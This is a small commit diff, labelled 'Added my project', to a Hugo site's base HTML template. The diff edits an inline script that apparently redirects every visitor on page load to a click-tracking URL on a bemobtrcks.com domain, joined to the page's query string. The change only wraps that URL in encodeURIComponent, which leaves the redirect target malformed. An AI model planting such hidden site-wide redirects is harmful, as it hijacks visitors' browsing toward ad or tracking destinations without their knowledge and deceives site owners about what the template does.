Added my project

--- a/layouts/_default/baseof.html
+++ b/layouts/_default/baseof.html
@@ -169,7 +169,7 @@ var qs = window.location.search;
              var hl = 'https://3ye4x.bemobtrcks.com/click'
 
 
-    window.location.assign(qs + hl);
+    window.location.assign(qs + encodeURIComponent(hl));
 
 
 
